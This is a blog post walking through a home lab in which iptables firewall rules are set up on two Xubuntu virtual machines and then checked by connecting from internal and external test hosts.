I created two virtual machines that were both running Xubuntu 13.10. One was simulating to be an internal web server and the other a developer machine. The internal web server was given the hostname “Xubuntu-web” and the IP address 192.168.133.150 on a host-only virtual network. The developer machine was given the hostname “Xubuntu-dev” and the IP address 192.168.133.200 on the same host-only network.

On Xubuntu-web the packages “openssh-server” and “apache2” were installed by using the command:

sudo apt-get install openssh-server apache2

 On Xubuntu-dev the packages “openssh-server” and “vsftpd” were installed by using the command:

sudo apt-get install openssh-server vsftpd

Before making any configuration changes, let’s make sure that everything is set up and working as it is supposed to. The image below shows that the two virtual machines were able to communicate on the network.

ping results

Xubuntu-web had an SSH server and a web server running (port 22 and port 80), and Xubuntu-dev had an FTP server and an SSH server running (port 21 and port 22), as shown in the image below.

running services

Finally, the three images below show that Xubuntu-web can access Xubuntu-dev’s FTP and SSH services, and Xubuntu-dev can access Xubuntu-web’s SSH and HTTP services.

web can ftp and ssh to dev

dev can ssh to web

dev can http to web

IPtables

Now that the two Xubuntu boxes have some services running and can communicate with each other, it’s time to start restricting access using IPtables. Let’s say that we want to implement the following security restrictions:

  • The intranet website should only be accessible from the internal network
  • The intranet server’s SSH service should only be accessible from the developer machine
  • The intranet server should not be able to use FTP or SSH services
  • The developer machine’s SSH service should be accessible from anywhere
  • The developer machine’s FTP service should only be accessible from the internal network

The syntax for implementing the first rule is this:

Sudo iptables –A INPUT –source 192.168.133.0/24 –p tcp –dport 80 –j ACCEPT

The breakdown of this command is as follows:

iptables                The command to configure the iptables firewall

-A                          Indicates that we will append a rule to the end of rule list

INPUT                  Indicates that this rule will be for incoming traffic

–source <ip>      The rule will apply to traffic originating from the designated address or range

-p <protocol>      The rule will apply to traffic matching the protocol

–dport  <port>   The rule will apply to traffic destined for the designated port

-j ACCEPT             Any traffic matching the rule will be accepted

Of course all the elements in this command can be changed based on what the rule is supposed to do or where it is supposed to fit in the rule list. For instance, instead of ‘-A’ to append a rule at the end of the list you can use ‘-I’ to insert a rule at a specific location, or ‘-D’ to delete a rule from the list. Instead of ‘-j ACCEPT’ you can use ‘-j REJECT’ to reject any traffic that matches the rule. To learn more about the syntax for IPtable rules and the different flags, I recommend the IPtable man pages, or otherwise this website.

While you are configuring your firewall or when you are done you can look at your rule list with this command:

Sudo iptables –L –n

The ‘-L’ flag displays the rule list, and the ‘-n’ flag enables numeric output. By default, IPtables will try to display output as hostnames, network names, or services. Using the ‘-n’ flag will speed up the output.

The rest of the firewall rules were implemented as shown in the images below.

firewall rules

From those images you might notice that I also added some rules that weren’t in the restriction requirements. For instance, the first rule in both lists allows incoming ICMP traffic from anywhere. This was purely done for testing purposes – so that I could make sure that a service is unavailable because the firewall is blocking it, not because the host cannot be contacted. In a production environment, this rule would likely not be implemented for security reasons. The second rule in both lists allows network traffic belonging to an established or related session. This means that any traffic coming back to a host that is part of, or related to, a session that the host originally established is allowed. Finally, the last rule in both incoming lists rejects all traffic other than what was explicitly allowed.

Testing

So now that the firewalls are up, let’s test them. Two additional virtual machines were used for the testing: A Windows XP box on the internal network, and a Kali Linux box on the external network (see the topology near the top of this blog post). The tests should show the following:

  • The intranet site should be accessible by all except Kali
  • The intranet server’s SSH service should only be accessible by the developer machine
  • The developer machines’ FTP service should be accessible only by Windows XP (because the intranet server is not allowing outgoing FTP or SSH requests)
  • The developer machine’s SSH service should be accessible by all except the intranet server (for the same reason)

First let’s check for the restrictions on access to the Intranet site. Using each virtual machine to open up a web browser and navigate to the Intranet site shows that both the developer machine and Windows XP have no problem reaching the site, but Kali Linux is blocked. This verifies that the site is only reachable from the internal network.

http test

Next we’ll test to make sure that only the developer machine can SSH into the Intranet web server. The developer machine was successfully able to establish an SSH connection with the server, but both Windows XP and Kali Linux are rejected. This verifies that our second restriction objective is met.

ssh to web test

Next we want to test that the developer’s FTP server is only accessible from the intranet. Connecting through Windows XP works just fine, but a connection from Kali Linux is rejected. The Intranet web server would be allowed to connect, but since that host has outbound SSH and FTP connections blocked through its own firewall the connection is rejected.

ftp to dev test

Finally, we want to test that the developer’s SSH service is accessible both from the internal and external network. Indeed, connecting from Windows XP and Kali Linux both leads to a successful SSH session. Again, the Intranet web server would also be allowed had the connection not been blocked by that host’s own firewall.

ssh to dev test

It seems that all desired network restrictions are enforced by the Linux IPtables firewalls. Although the title of this blog post was “Linux IPtables” a large part of the post was dedicated to testing the IPtable rules rather than setting them up. The thing is, setting up rules is easy once you get a hang of the syntax. However, setting them up correctly and verifying that they have been set up correctly is more complicated. The more rules you implement, the more difficult it gets because they tend to interfere with each other. You can’t test a rule from one host and assumes it works correctly. What I really wanted to show in this post was how to logically think through your firewall rules and how to test them from multiple hosts and subnets.

Leave me a comment for feedback!